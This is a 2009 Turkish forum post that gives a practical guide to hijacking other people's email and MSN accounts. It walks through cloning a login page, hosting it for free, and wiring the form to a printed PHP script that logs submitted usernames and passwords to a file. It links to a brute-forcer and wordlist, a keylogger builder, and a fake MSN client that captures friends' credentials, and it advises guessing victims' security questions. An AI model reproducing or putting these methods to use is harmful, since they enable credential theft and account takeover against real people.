E-Mail Hacking [Detaylı-Örnekli Anlatım]

Konu: E-Mail Hacking [Detaylı-Örnekli Anlatım] C.tesi Nis. 11, 2009 11:12 pm

E- Mail Hacklemenin Yolları

Phishing

Phishing
İçin Keyloggerın Bir Turu Diyebiliriz Fakat Başka Bir Anlamda.Diyelimki
Hotmail phishing sayfası oluşturacaksınız.Oluşturacağınız sayfa
gerçeğiyle birebir olmalıdır.

Nasıl Çalışır:

Phishing
yapacağınız sayfanın bir kopyasını indirirsiniz ve HTML olarak
kaydedersiniz bunu yaptıktan sonra bu html sayfasını upload etmenin
yollarını aramalısınız.En İyi Yol Piczo\\\\Blogspot gibi sitelere
upload etmektir.Buda olduktan sonra kurbanınız kullanıcı adını ve
şifresini yazar ve bunlar otomatikman e-mailinize yollanır.İşte Böyle
Phishing yapmış olursunuz .

Örnek Bir Phishing İşlemi :

1-Bu işlem için öncelikle elinizde dosyalarınızı upload edeceğiniz bir host’unuz olmalıdır.www.t35.com ,www.110mb.com,www.700megs.com gibi bedava hosting görevini yapan siteler işinizi görecektir bu sitelerden birine girin ve bir hesap alın.

2-Bundan
sonra phisher yapmak istediginiz siteye gidin ben bu işlemde
http://www.forums.khinsider.com/ sitesini kullanacağım siteden çıkış
yaptığınızdan emin olun ve bir mesaj atmaya çalışın sizden foruma üye
olmanızı isteyecektir.Burda ise sayfaya sağ tıklayıp “sayfa kaynağını
göster” e tıklayın ve açılan sayfadaki tüm kodları kopyalayın
kopyaladığınız kodları kullanacağınız siteye upload edin ve
“login.htm” olarak kayıt edin.

3-Daha
Sonra Hostumuzda “New File” Secenegine tıklayıp “fhish.php” baslıklı
bir dosya olusturun ve asagıdaki kodu oraya yapıstırın.
Code:
[INDENT]<?php
header("Location: http://www.myspace.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\\\\r\\\\n");
}
fwrite($handle, "\\\\r\\\\n");
fclose($handle);
exit;
?>[/INDENT]

(koddaki
http://www.myspace.com bölümü kurbanınızın kullanıcı adı ve şifreyi
girdikten sonra yönlendirileceği sayfadır bu yüzden işleme uygun olarak
belirleyin)

4-Sonra oluşturduğumuz
“fhish.php” yi kayıt edin. Sonra “Login.htm” dosyasına gelin ve “edit”
e tıklayın “Ctrl+F” tuşuna basıp “action=” “action=log in” gibi
kelimeler içeren kodu bulana kadar devam edin bulduğunuzda ise action=
(herhangibirşey) kısmındaki yani “action=” kısmının devamındaki yeri
“fhish.php”ile değiştirin.

Ve İşte Bu Kadar Bundan Sonra
Elinizde Bir Phisher Var. Kurbanlarınız siteye giriş yaptıklarında
onların kullanıcı adları sizin host’unuza otomatik olarak “passes.txt”
olarak kaydedilecektir. :)

Brute Forcing

Brute
Forcing işlemi kullanıcının şifresini tahmin etmek gibidir.Fakat bu
işlemde siz tek tek tahmin etmek yerine bir şifre listesi download
edersiniz (muhtemel şifremizin olduğu uzun bir “txt” dosyası) ve Brute
Force programı listedeki tüm şifreleri sizin için dener.

Örnek Olarak : Msn Brute Forcer’ı Aşağıdaki Linkten indirebilirsiniz. http://www.speedyshare.com/228815220.html(Uyarı - Trojan Barındırabilir bu yüzden Sanal Pc’nizde deneyin)

80.000 Kelime İçeren WordList İçinse Aşağıdaki Linki Kullanın.

http:///* Müstehcen reklam içeren bir paylaşım sitesi*//?id=1wd51i

Keyloggerlar

Keyloggerlarda
phishing işlemindeki gibi çalışır ama burada çalıştırılabilir bir “exe”
dosyası vardır ve kurbanınız bu “exe” dosyasını bilgisayarında
çalıştırdığında sizin belirlediğiniz zaman aralığında kurbanınızın
bastığı tuşlar “txt” dosyası olarak e-mailinize gönderilir veya ftp
serverınıza yüklenir.

Tarafımdan Denenmiş Ve Çalışan Keylogger İçin Aşağıdaki Linki Kullanabilirsiniz.
Bu Keylogger Creator’u kullanmak için bir ftp hosting servisine ihtiyacınız vardır.Denenen 110mb.com İşinizi Görür.

http://rapidshare.de/files/45601485/Albertino_Keylogger_Creater_3.0.rar.html

http://s1.dosya.tc/AlbertinoKeyloggerCreater3.0.rar.html

http://www.savefile.com/files/2015437

Rar Şifresi = Cyberwarrior-cmurder

Fake MSN

FakeMSN
ise kullandığımız MSN messengerin bir kopyasıdır diyebiliriz.Diyelimki
eve birkaç arkadaşınız geldi ve msn’e girmek istedi .Kendi
bilgisayarınızda FakeMSN yi açarsınız ve onlarda kullanıcı adı ve
şifrelerini girerler ve doğal olarak FakeMSN kullandıkları için Login
olamazlar.Sizde onlara daha sonra gerçek yani çalışan msn’yi açarsınız
ve böylece arkadaşlarınızla aranızda bir problem kalmaz:).Tüm bu
işlemler olurken arkadaşlarınızın FakeMSN de Kullandıkları kullanıcı
adları ve şifreler “Txt” Dosyası olarak “C:\\\\” dizinine kaydedilir.

FakeMSNAşağıdaki Linkten İndirebilirsiniz.

http://www.savefile.com/files/1357897

Güvenlik Sorusunu Tahmin Etme

Eğer kurbanınızı yakından tanıyorsanız bu sizin için kolay bir işlem olacaktır.Mesela Kurbanın msn şifresini istiyorsunuz www.hotmail.com a
girersiniz ve bu sayfada “Parolamı Unuttum” Linkine tıklarsınız.Açılan
Sayfada ise güvenlik sorusunu tahmin edersiniz yalnız dikkatli olun
çünkü 3 şansınız var.

» E-mail Güvenliği-2
» E-Mail Güvenliği
» PNC Crypter %100 Tanınmaz Videolu anlatım
» Mail Security ~Msniniz Hacklenmesin~
» mail bomber icin dns adresleri